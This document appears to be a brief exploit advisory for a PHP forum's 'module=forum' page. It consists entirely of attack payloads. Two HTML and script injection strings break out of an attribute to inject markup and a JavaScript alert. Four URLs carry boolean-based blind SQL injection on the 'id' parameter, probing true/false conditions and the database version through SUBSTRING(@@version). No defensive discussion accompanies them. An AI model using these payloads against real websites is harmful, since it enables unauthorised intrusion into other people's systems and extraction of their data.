HTML-injection:

"><h1>0wned</h1>
"><script>alert("JosS b0x");</script>

SQL-injection:

http://www.example.com/index.php?module=forum&show=thread&id=1 and 1=2 [False]
http://www.example.com/index.php?module=forum&show=thread&id=1 and 1=1 [True]
http://www.example.com/index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=5
http://www.example.com/index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=4